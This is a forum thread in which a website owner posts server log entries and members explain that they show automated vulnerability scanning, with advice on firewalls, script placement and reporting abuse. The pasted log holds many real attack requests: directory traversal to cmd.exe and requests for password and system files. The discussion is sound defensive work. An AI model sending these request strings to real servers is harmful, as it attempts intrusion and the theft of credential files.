Results 1 to 7 of 7
  1. #1
    Devil's Reject Electropulse's Avatar
    Join Date
    January 18th, 2005
    Posts
    987
    help me, what is all this in my logs, there's more but I had to shorten it. is someone probing for vulnerabilies?

    /cgi-bin/formmail.cgi 9
    /cgi-bin/formmail.pl 8
    /_vti_bin/_vti_aut/dvwssr.dll 3
    /piranha/secure/passwd.php3 3
    /cgi-bin/webgais 2
    /default.asp 2
    /cgi-bin/webspirs.cgi 2
    /administrator/ 2 http://
    /pservlet.html 1 http://
    /samples/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir 1 http://
    /scripts/Carello/add.exe 1 http://
    /Rpc/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir 1 http://
    /scripts/no-such-file.pl 1 http://
    /scripts/dnewsweb.exe 1 http://
    /program/ 1 http://
    /MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c 1 http://
    /tools/ 1 http://
    /index.html.bak 1 http://
    /bbs/ 1 http://
    /adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir 1 http://
    /null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full 1 http://
    /img/ 1 http://
    /_vti_pvt/administrators.pwd 1 http://
    /logging/ 1 http://
    /Stats/ 1 http://
    /cgi-bin/ceilidh.exe 1 http://
    /phorum/common.php 1 http://
    /server_stats/ 1 http://
    /lib/ 1 http://
    /cgi-bin/classifieds.cgi 1 http://
    /iissamples/sdk/asp/docs/codebrws.asp 1 http://
    /d/inetpub/scripts/root.exe?/c+dir 1 http://
    /cgi-bin/bbs_forum.cgi
    /cgi-bin/cal_make.pl 1 http://
    /cfdocs/expeval/displayopenedfile.cfm 1 http://
    /admin.php3?admin=anything 1 http://
    /iisadmpwd/anot3.htr 1 http://
    /cgi-bin/test.bat 1 http://
    /cache-stats/ 1 http://
    /cgi-bin/view-source 1 http://
    /bbs/include/ 1 http://
    /ROADS/cgi-bin/search.pl 1 http://
    /cgi-bin/perlshop.cgi 1 http://
    /cgi-bin/FormMail.cgi 1 -
    /logfile/ 1 http://
    /iisadmpwd/aexp.htr 1 http://
    /.htpasswd/ 1 http://
    /cgi-bin/cvsweb/cvsweb.cgi 1 http://
    /test.ida 1 http://
    /test.idc 1 http://
    /cgi-bin/day5datanotifier.cgi 1 http://
    /wstats/ 1 http://
    /misc/ 1 http://
    /cgi-bin/register.cgi 1 http://
    /bbs/db/ 1 http://
    /ports/ 1 http://
    /iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full 1 http://
    /cgi-bin/input2.bat 1 http://
    /cgi-bin/phf 1 http://
    /test.idq 1 http://
    /banners.php?op=Change 1 http://
    /cgi-bin/faxsurvey 1 http://
    /cgi-bin/info2www 1 http://
    /technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi 1 http://
    /_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir 1 http://
    /cgi-bin/php 1 http://
    /test.idw 1 http://
    /msql/ 1 http://
    /test/ 1 http://
    /exchange/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir 1 http://
    /wwwstats.html 1 http://
    /....../autoexec.bat 1 http://
    /cgi-bin/whois_raw.cgi 1 http://
    /sql/ 1 http://
    /cgi-bin/dmailweb.cgi 1 http://
    /private/.htpasswd 1 http://
    /cgi-bin/Search.pl 1 http://
    /MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c 1 http://
    /ows-bin/perlidlc.bat?&dir 1 http://
    /phpgroupware/inc/phpgwapi/phpgw.inc.php 1 http://
    /wwwstats/ 1 http://
    /bin/common/user_update_passwd.pl 1 http://
    /down/ 1 http://
    /isapi/tstisapi.dll 1 http://
    /backup/ 1 http://
    /cgi-bin/htmlscript 1 http://
    /scripts/c32web.exe 1 http://
    /cgi-auth/userreg.cgi 1 http://
    /girls/ 1 http://
    /iisadmpwd/aexp4b.htr 1 http://
    /cgi/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c 1 http://
    /cgi-bin/phf.cgi 1 http://
    /cgi-bin/wconsole.dll 1 http://
    /c/inetpub/scripts/root.exe?/c+dir 1 http://
    /bin/common/user_update_admin.pl 1 http://
    /cgi-bin/YaBB.pl 1 http://
    /cgi/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir 1 http://
    /snort2html.html 1 http://
    /caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000 1 http://
    /cgi-bin/dumpenv.pl 1 http://
    /Newuser?Image=../../database/rbsserv.mdb 1 http://
    /cgi-bin/hello.bat 1 http://
    /image/ 1 http://
    /cgi-bin/alibaba.pl 1 http://
    /wwwlog/ 1 http://
    /cgi-bin/cached_feed.cgi 1 http://
    /cgi-bin/test-cgi 1 http://
    /INDUSTRY 1 -
    /includes/ 1 http://
    /technote/print.cgi 1 http://
    /cgi-bin/counterfiglet/nc/f 1 http://
    /cgi-bin/subscribe.pl 1 http://
    /phpPhotoAlbum/explorer.php 1 http://
    /common/browser.inc 1 http://
    /cgi-bin/bb-hist.sh 1 http://
    /cgi-bin/pagelog.cgi 1 http://
    /bbs/data/ 1 http://
    /cgi-bin/tst.bat 1 http://
    /caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd 1 http://
    /user.php&op=saveuser 1 http://
    /_vti_pvt/users.pwd 1 http://
    /iissamples/exair/search/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full 1 http://
    /databases/ 1 http://
    /cgi-bin/mailform.pl 1 http://
    /cgi-bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir 1 http://
    /cpqlogin.htm 1 http://
    /PBServer/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir 1 http://
    /_mem_bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir 1 http://
    /iisadmpwd/aexp3.htr 1 http://
    /cgi-bin/global.cgi 1 http://
    /scripts/dmailweb.exe 1 http://
    /public/ 1 http://
    /login.asp%3F+.htr 1 http://
    /acid/ 1 http://
    /cgi-bin/ikonboard/help.cgi 1 http://
    /bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir 1 http://
    /cgi-bin/handler 1 http://
    /document/ 1 http://
    /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c 1 http://
    /cgi-bin/cachemgr.cgi 1 http://
    /cgi-bin/ad.cgi 1 http://
    /cgi-bin/responder.cgi 1 http://
    /cgi-bin/calender_admin.pl 1 http://
    /log.html 1 http://
    /catalog.nsf 1 http://
    /iissamples/exair/search/advsearch.asp 1 http://
    /global.asa+.htr 1 http://
    /cgi-bin/input.bat 1 http://
    /cgi-bin/rguest.exe

  2. #2
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    2,402
    That is someone looking for a vulnerability in your system. Oftentimes, they are looking for windows exploits, but in your case they are looking for exploits with various cgi scripts. If you are not running any of those programs, there isn't a lot to worry about. If you are, you want to double check and make sure everything is either secure or removed.

    An good example I've seen is a program that uses an install script. The install script for this program should be removed after you have installed it...problem is many people will leave it up...a program like your seeing will call the url with the install script and it will wipe out someones board or whatever program it was. Hope this explanation helps

    TH Media-Web Solutions For The Small Business
    Check Out The TH Media Affiliate Program

  3. #3
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    2,402
    BTW, I should add that it is software that snoops around looking for those scripts...it isn't necessarily someone directing it personally towards you.

    TH Media-Web Solutions For The Small Business
    Check Out The TH Media Affiliate Program

  4. #4
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    2,341
    <BLOCKQUOTE class="ip-ubbcode-quote"><font size="-1">quote:</font><HR>Originally posted by TH Media:
    ....you want to double check and make sure everything is either secure or removed.
    <HR></BLOCKQUOTE>

    How do we make sure things are secure?

    Andy Williams

    Keyword DARTs - New search engine optimization software
    http://www.affiliate-masters.co.uk/k...timization.htm

  5. #5
    ABW Ambassador
    Join Date
    January 18th, 2005
    Posts
    4,423
    If you install bastille or other firewall software, it will drop this persons attempts if they probe too many times, not perfect but it helps.

    And this makes a good case for always installing software in a non-standard directories (naming) and always being careful about what is in your cgi-bin.

    People like to say obscurity isn't security, but that is foolish. Sure if someone was trying to hack your particular site it would not help, but this just looks like a kiddie scanning away looking for any target, in that case obscurity helps.

    Do you have the IP? Trace it back and report the scanner. It is probably a compromised box or some kiddies home account. Either way it helps to inform the person.

    Chet

  6. #6
    ABW Ambassador FFoc's Avatar
    Join Date
    January 18th, 2005
    Posts
    1,015
    I trace it back to the ISP and send an email off to the ISP's abuse@.. email address - the attack probes usually stop pretty quick.

    Ford Fox-body Owners Club
    http://www.ford-fox.org

  7. #7
    Devil's Reject Electropulse's Avatar
    Join Date
    January 18th, 2005
    Posts
    987
    hey thanks guys, I only have awstats running on my site.

    right now I'm checking the raw logs for the ip or bot so I can ban it.

    thanks.

  8. Newsletter Signup

+ Reply to Thread

Similar Threads

  1. logs....what is that
    By Roland in forum Midnight Cafe'
    Replies: 5
    Last Post: February 11th, 2006, 07:55 PM
  2. 304 In Logs
    By reaper in forum Cusimano.com Scripts
    Replies: 1
    Last Post: October 4th, 2005, 12:44 PM
  3. Error Logs
    By cazzie in forum Midnight Cafe'
    Replies: 1
    Last Post: October 24th, 2004, 08:31 AM
  4. Referrals Logs?
    By Donuts in forum Midnight Cafe'
    Replies: 0
    Last Post: September 27th, 2004, 09:00 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •